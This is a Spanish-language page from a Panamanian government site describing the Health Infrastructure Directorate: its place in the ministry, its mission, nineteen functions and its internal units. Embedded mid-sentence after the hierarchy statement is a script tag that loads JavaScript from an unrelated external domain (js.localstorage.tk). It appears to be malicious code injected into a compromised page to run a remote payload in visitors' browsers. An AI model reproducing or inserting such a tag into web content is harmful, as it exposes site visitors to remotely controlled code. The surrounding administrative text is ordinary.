Gobierno Nacional de Panamá

Dirección de Infraestructura de Salud

Información de contacto

Teléfono:
512-9120

Enlaces relacionados

Ubicación y dependencia jerárquica

La Dirección de Infraestructura de Salud está ubicada en el Nivel Auxiliar de Apoyo y depende jerárquicamente del Despacho Superior.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>
Misión:
  1. Garantizar las condiciones óptimas de las infraestructuras de salud que comprende edificaciones, equipos industriales y biomédicos y obras sanitarias, a través del cumplimiento de las normas y las leyes relacionadas con las edificaciones y equipos sanitarios, para asegurar que estén en condiciones óptimas para la provisión de servicios de atención a la población y al ambiente.
Funciones:
  1. Coordinar con la Dirección de Planificación de Salud en la definición de políticas sanitarias relativas a las condiciones que deben reunir la infraestructura y equipamiento de las instalaciones de salud.
  2. Coordinar con la Dirección de Planificación de Salud en la formulación y evaluación del presupuesto de inversión.
  3. Garantizar que los proyectos incorporados al presupuesto de inversión cumplan con los requisitos técnicos y legales vigentes.
  4. Dirigir la elaboración de protocolos para la formulación de proyectos de inversión, que se sustenten en la normativa vigente a nivel del Estado.
  5. Impulsar el proceso de descentralización relativo a la construcción, rehabilitación, mantenimiento y equipamiento de las instalaciones de salud.
  6. Coordinar con los diferentes niveles de la organización la ejecución de los proyectos de infraestructura y obras sanitarias garantizando la aplicación de las normas vigentes de diseño de ingeniería y arquitectura, que incluya los aspectos de mitigación para obras de desastre.
  7. Promover y apoyar la actualización del inventario de tierras legalizadas y no legalizadas, instalaciones, equipos y obras sanitarias del Ministerio de Salud.
  8. Apoyar la formulación y ejecución de programas de conservación, mantenimiento y desarrollo de la red de infraestructura sanitaria a nivel central, regional y local.
  9. Orientar la implementación de planes de mantenimiento preventivo y correctivo de las instalaciones de salud, los equipos industriales y biomédicos, servicios esenciales de agua potable, pozos, acueductos y obras de saneamiento, a fin de conservar la calidad material y funcional para asegurar la eficiencia en la utilización de dichas instalaciones y obras sanitarias.
  10. Promover el uso de tecnologías apropiadas para minimizar los impactos negativos al aire, suelo y agua por afluentes líquidos, sólidos y gaseosos de instalaciones de salud.
  11. Dirigir el diseño del protocolo para el levantamiento del catastro de la infraestructura de salud.
  12. Dirigir la actualización y preparación periódica del catastro de toda la red de servicios públicos de salud, según su condición y categorización por niveles de atención y complejidad de la red de servicios, en todo el territorio nacional.
  13. Asesorar a los diferentes niveles de la organización en el descarte de equipo biomédico, considerando sus condiciones y vida media, según especificaciones y normas técnicas existentes.
  14. Asesorar técnicamente a las Direcciones correspondientes del Ministerio de Salud en todos los niveles, a través de los conductos regulares y a otros organismos externos del sector salud, sobre aspectos relativos a la programación y planeamiento de las instalaciones de salud y obras sanitarias.
  15. Colaborar en la aprobación por el Consejo Técnico de Salud todos los proyectos de las nuevas instalaciones de salud gubernamentales y del sector privado y verificar si están de acuerdo con las normas establecidas por el Código Sanitario y sus reglamentos.
  16. Impulsar la aplicación de las normas de seguridad de instalaciones y equipamiento en la red de servicios de salud, según las normas y disposiciones vigentes.
  17. Controlar y supervisar, en conjunto con los equipos de las oficinas regionales de infraestructura, el proceso de construcción de los proyectos de las instalaciones de salud y otras obras sanitarias, a nivel nacional.
  18. Coordinar con la Dirección de Planificación de Salud, la elaboración y adecuación de los instrumentos y procedimientos, para el registro, flujo y análisis de información actualizada, sobre los aspectos del sistema de infraestructura sanitaria de ingeniería y mantenimiento (SIDIS).
  19. Monitorear el Sistema de Información de Infraestructura Sanitaria de Ingeniería y Mantenimiento (SIDIS).
Organización Interna

La Dirección de Infraestructura de Salud para el cumplimiento de sus funciones, cuenta con las siguientes unidades administrativas:

  • Sub Dirección
  • Departamento de Arquitectura
  • Departamento de Inspecciones
  • Departamento de Ingeniería y Mantenimiento de Infraestructura
  • Sección de Saneamiento Intrahospitalario e Instalaciones Industriales